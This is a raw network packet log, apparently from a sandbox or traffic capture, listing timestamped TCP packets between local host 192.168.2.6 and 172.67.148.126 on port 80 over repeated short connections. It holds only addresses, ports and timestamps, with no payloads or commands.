Apr 6, 2024 09:30:41.838639975 CEST	49820	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:41.964102030 CEST	80	49820	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:41.964200974 CEST	49820	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:41.966392994 CEST	49820	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:42.092077971 CEST	80	49820	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:42.092147112 CEST	49820	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:42.217899084 CEST	80	49820	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:42.459868908 CEST	80	49820	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:42.460073948 CEST	49820	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:42.460437059 CEST	80	49820	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:42.460484982 CEST	49820	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:42.584270000 CEST	80	49820	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:42.609497070 CEST	49821	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:42.734188080 CEST	80	49821	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:42.734335899 CEST	49821	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:42.736556053 CEST	49821	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:42.860680103 CEST	80	49821	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:42.860810995 CEST	49821	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:42.985167980 CEST	80	49821	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:43.230144024 CEST	80	49821	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:43.230164051 CEST	80	49821	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:43.230218887 CEST	49821	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:43.230245113 CEST	49821	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:43.355782032 CEST	80	49821	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:43.375700951 CEST	49822	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:43.501344919 CEST	80	49822	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:43.501458883 CEST	49822	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:43.503602982 CEST	49822	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:43.627646923 CEST	80	49822	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:43.627749920 CEST	49822	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:43.751894951 CEST	80	49822	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:43.994375944 CEST	80	49822	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:43.994505882 CEST	80	49822	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:43.994529963 CEST	49822	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:43.994565010 CEST	49822	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:44.118913889 CEST	80	49822	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:44.141845942 CEST	49823	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:44.267196894 CEST	80	49823	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:44.267332077 CEST	49823	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:44.269499063 CEST	49823	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:44.393759012 CEST	80	49823	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:44.393898010 CEST	49823	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:44.518663883 CEST	80	49823	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:44.762161970 CEST	80	49823	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:44.762267113 CEST	80	49823	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:44.762331009 CEST	49823	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:44.762367010 CEST	49823	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:44.886682034 CEST	80	49823	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:44.915709972 CEST	49824	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:45.039701939 CEST	80	49824	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:45.039860964 CEST	49824	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:45.042074919 CEST	49824	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:45.165775061 CEST	80	49824	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:45.165846109 CEST	49824	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:45.290060997 CEST	80	49824	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:45.534812927 CEST	80	49824	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:45.534953117 CEST	80	49824	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:45.535015106 CEST	49824	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:45.535073042 CEST	49824	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:45.658957005 CEST	80	49824	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:45.671329975 CEST	49825	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:45.795756102 CEST	80	49825	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:45.799382925 CEST	49825	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:45.801532984 CEST	49825	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:45.925749063 CEST	80	49825	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:45.927334070 CEST	49825	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:46.051652908 CEST	80	49825	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:46.311472893 CEST	80	49825	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:46.311486959 CEST	80	49825	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:46.311531067 CEST	49825	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:46.315598965 CEST	49825	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:46.443289995 CEST	80	49825	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:46.462117910 CEST	49826	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:46.589709997 CEST	80	49826	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:46.589840889 CEST	49826	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:46.592041969 CEST	49826	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:46.717345953 CEST	80	49826	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:46.717474937 CEST	49826	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:46.842045069 CEST	80	49826	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:47.092871904 CEST	80	49826	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:47.093091011 CEST	49826	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:47.093346119 CEST	80	49826	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:47.093398094 CEST	49826	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:47.218019009 CEST	80	49826	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:47.234719038 CEST	49827	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:47.358977079 CEST	80	49827	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:47.359118938 CEST	49827	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:47.361320972 CEST	49827	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:47.484977961 CEST	80	49827	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:47.485132933 CEST	49827	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:47.608577013 CEST	80	49827	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:47.897085905 CEST	80	49827	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:47.897269964 CEST	49827	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:47.897469044 CEST	80	49827	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:47.897524118 CEST	49827	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:48.023000002 CEST	80	49827	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:48.053819895 CEST	49828	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:48.179337978 CEST	80	49828	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:48.179460049 CEST	49828	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:48.181653976 CEST	49828	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:48.305964947 CEST	80	49828	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:48.306097031 CEST	49828	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:48.430571079 CEST	80	49828	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:48.690085888 CEST	80	49828	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:48.690260887 CEST	49828	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:48.690376997 CEST	80	49828	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:48.690429926 CEST	49828	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:48.814973116 CEST	80	49828	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:48.829344034 CEST	49829	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:48.955138922 CEST	80	49829	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:48.955225945 CEST	49829	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:48.957387924 CEST	49829	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:49.081886053 CEST	80	49829	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:49.081947088 CEST	49829	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:49.207077026 CEST	80	49829	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:49.472393036 CEST	80	49829	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:49.472501993 CEST	49829	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:49.473009109 CEST	80	49829	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:49.473057032 CEST	49829	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:49.596791029 CEST	80	49829	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:49.608642101 CEST	49830	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:49.732923031 CEST	80	49830	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:49.733088970 CEST	49830	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:49.735328913 CEST	49830	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:49.859934092 CEST	80	49830	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:49.860052109 CEST	49830	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:49.984110117 CEST	80	49830	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:50.249002934 CEST	80	49830	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:50.249114990 CEST	49830	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:50.249672890 CEST	80	49830	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:50.249728918 CEST	49830	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:50.373356104 CEST	80	49830	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:50.389012098 CEST	49831	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:50.513509989 CEST	80	49831	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:50.513772964 CEST	49831	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:50.516268969 CEST	49831	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:50.652935982 CEST	80	49831	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:50.653028965 CEST	49831	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:50.777252913 CEST	80	49831	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:51.033349037 CEST	80	49831	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:51.033489943 CEST	80	49831	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:51.033564091 CEST	49831	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:51.033564091 CEST	49831	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:51.161230087 CEST	80	49831	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:51.186696053 CEST	49832	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:51.312093019 CEST	80	49832	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:51.312350988 CEST	49832	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:51.314444065 CEST	49832	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:51.438668966 CEST	80	49832	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:51.438863039 CEST	49832	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:51.562994003 CEST	80	49832	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:51.821953058 CEST	80	49832	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:51.822046995 CEST	80	49832	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:51.822208881 CEST	49832	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:51.822208881 CEST	49832	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:51.946485043 CEST	80	49832	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:51.969448090 CEST	49833	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:52.093905926 CEST	80	49833	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:52.093998909 CEST	49833	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:52.096159935 CEST	49833	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:52.221084118 CEST	80	49833	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:52.221276999 CEST	49833	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:52.345475912 CEST	80	49833	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:52.595098019 CEST	80	49833	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:52.595221996 CEST	49833	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:52.595623016 CEST	80	49833	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:52.595741034 CEST	49833	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:52.719275951 CEST	80	49833	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:52.738703966 CEST	49834	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:52.862714052 CEST	80	49834	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:52.862808943 CEST	49834	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:52.865138054 CEST	49834	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:52.989810944 CEST	80	49834	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:52.989932060 CEST	49834	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:53.113814116 CEST	80	49834	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:53.373054981 CEST	80	49834	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:53.373158932 CEST	80	49834	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:53.373215914 CEST	49834	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:53.373323917 CEST	49834	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:53.497209072 CEST	80	49834	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:53.514619112 CEST	49835	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:53.639394999 CEST	80	49835	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:53.639555931 CEST	49835	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:53.641649961 CEST	49835	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:53.769198895 CEST	80	49835	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:53.769378901 CEST	49835	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:53.893656969 CEST	80	49835	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:54.149101973 CEST	80	49835	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:54.149226904 CEST	49835	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:54.149319887 CEST	80	49835	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:54.149363995 CEST	49835	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:54.273849010 CEST	80	49835	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:54.296710968 CEST	49836	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:54.420319080 CEST	80	49836	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:54.420440912 CEST	49836	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:54.422589064 CEST	49836	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:54.546200037 CEST	80	49836	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:54.546266079 CEST	49836	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:54.669842005 CEST	80	49836	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:54.946742058 CEST	80	49836	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:54.946878910 CEST	49836	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:54.947458029 CEST	80	49836	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:54.947514057 CEST	49836	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:55.070353985 CEST	80	49836	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:55.092863083 CEST	49837	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:55.217751980 CEST	80	49837	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:55.217823982 CEST	49837	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:55.220104933 CEST	49837	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:55.344584942 CEST	80	49837	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:55.344695091 CEST	49837	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:55.469290018 CEST	80	49837	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:55.725775957 CEST	80	49837	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:55.725898981 CEST	80	49837	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:55.725899935 CEST	49837	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:55.725938082 CEST	49837	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:55.850384951 CEST	80	49837	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:55.871936083 CEST	49838	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:55.995872021 CEST	80	49838	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:55.995965004 CEST	49838	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:55.998033047 CEST	49838	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:56.121817112 CEST	80	49838	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:56.121968031 CEST	49838	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:56.245847940 CEST	80	49838	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:56.498783112 CEST	80	49838	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:56.498930931 CEST	80	49838	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:56.499044895 CEST	49838	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:56.499046087 CEST	49838	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:56.623030901 CEST	80	49838	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:56.645720005 CEST	49839	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:56.769973993 CEST	80	49839	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:56.770073891 CEST	49839	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:56.772335052 CEST	49839	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:56.896563053 CEST	80	49839	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:56.896739006 CEST	49839	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:57.020937920 CEST	80	49839	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:57.295444965 CEST	80	49839	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:57.295584917 CEST	80	49839	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:57.295645952 CEST	49839	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:57.322300911 CEST	49839	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:57.446536064 CEST	80	49839	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:57.466577053 CEST	49840	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:57.590815067 CEST	80	49840	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:57.591036081 CEST	49840	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:57.593507051 CEST	49840	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:57.717737913 CEST	80	49840	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:57.717902899 CEST	49840	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:57.842037916 CEST	80	49840	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:58.094893932 CEST	80	49840	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:58.094990015 CEST	49840	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:58.095091105 CEST	80	49840	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:58.095139980 CEST	49840	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:58.219307899 CEST	80	49840	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:59.800259113 CEST	49841	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:59.925560951 CEST	80	49841	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:59.925698996 CEST	49841	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:59.991734028 CEST	49841	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:00.115789890 CEST	80	49841	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:00.115890980 CEST	49841	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:00.239835024 CEST	80	49841	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:00.493268013 CEST	80	49841	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:00.493495941 CEST	49841	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:00.493552923 CEST	80	49841	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:00.493639946 CEST	49841	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:00.617388010 CEST	80	49841	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:00.643373013 CEST	49842	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:00.767209053 CEST	80	49842	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:00.767308950 CEST	49842	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:00.769505024 CEST	49842	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:00.893496037 CEST	80	49842	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:00.893640995 CEST	49842	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:01.017385960 CEST	80	49842	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:01.281761885 CEST	80	49842	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:01.281917095 CEST	80	49842	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:01.282001972 CEST	49842	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:01.283277035 CEST	49842	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:01.405986071 CEST	80	49842	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:01.420500040 CEST	49843	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:01.544548035 CEST	80	49843	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:01.544631004 CEST	49843	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:01.546958923 CEST	49843	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:01.670851946 CEST	80	49843	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:01.670955896 CEST	49843	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:01.794930935 CEST	80	49843	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:02.058294058 CEST	80	49843	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:02.058315992 CEST	80	49843	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:02.058427095 CEST	49843	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:02.058468103 CEST	49843	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:02.183892965 CEST	80	49843	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:02.206125975 CEST	49844	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:02.330610991 CEST	80	49844	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:02.330699921 CEST	49844	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:02.332844973 CEST	49844	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:02.457050085 CEST	80	49844	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:02.457158089 CEST	49844	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:02.581681967 CEST	80	49844	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:02.836838961 CEST	80	49844	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:02.837030888 CEST	80	49844	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:02.837107897 CEST	49844	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:02.837403059 CEST	49844	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:02.961693048 CEST	80	49844	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:02.993062019 CEST	49845	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:03.117464066 CEST	80	49845	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:03.117774963 CEST	49845	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:03.119856119 CEST	49845	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:03.243938923 CEST	80	49845	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:03.244040012 CEST	49845	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:03.368280888 CEST	80	49845	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:03.618990898 CEST	80	49845	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:03.619132996 CEST	49845	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:03.619349957 CEST	80	49845	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:03.619401932 CEST	49845	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:03.747432947 CEST	80	49845	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:03.765621901 CEST	49846	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:03.889533043 CEST	80	49846	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:03.889610052 CEST	49846	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:03.891736984 CEST	49846	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:04.015767097 CEST	80	49846	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:04.015881062 CEST	49846	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:04.139799118 CEST	80	49846	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:04.394763947 CEST	80	49846	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:04.394932985 CEST	49846	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:04.395667076 CEST	80	49846	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:04.395711899 CEST	49846	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:04.518757105 CEST	80	49846	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:04.531620026 CEST	49847	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:04.656651020 CEST	80	49847	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:04.656847954 CEST	49847	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:04.659571886 CEST	49847	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:04.784498930 CEST	80	49847	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:04.784728050 CEST	49847	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:04.909006119 CEST	80	49847	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:05.165330887 CEST	80	49847	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:05.165555000 CEST	49847	80	192.168.2.6	172.67.148.126
